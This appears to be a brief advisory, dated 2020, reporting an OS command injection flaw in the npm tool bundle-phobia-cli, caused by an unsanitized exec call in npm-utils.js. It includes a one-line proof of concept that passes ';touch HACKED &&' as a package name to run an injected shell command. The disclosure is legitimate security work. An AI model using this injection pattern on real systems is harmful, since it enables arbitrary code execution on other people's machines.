OS Command Injection in adrieankhisbe/bundle-phobia-cli
Sep 1st 2020
BundlePhobia is a tool to help you find the cost of adding a npm package to your bundle. It enables you to query package sizes.
npm-utils.js has a unsanitized
exec function which leads to
Arbitrary code execution
const util = require('./npm-utils.js'); let a = util.getVersionList(';touch HACKED &&'); console.log(a);
to join this conversation